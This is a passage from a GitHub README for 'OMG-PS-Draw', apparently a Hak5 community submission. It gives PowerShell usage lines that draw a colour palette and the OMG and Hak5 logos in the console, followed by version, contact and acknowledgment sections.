* "$col | PS-Draw" - This first one will show the available colors to be used as seen below
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG-PS-Draw/Images/ps-colors.jpg)
* "$omg | PS-Draw" - This will draw out the OMG logo as seen below
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG-PS-Draw/Images/ps-omg.jpg)
* "$hak5 | PS-Draw" - This will draw out the Hak5 logo as seen below
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG-PS-Draw/Images/ps-hak5.jpg)
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG-PS-Draw)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>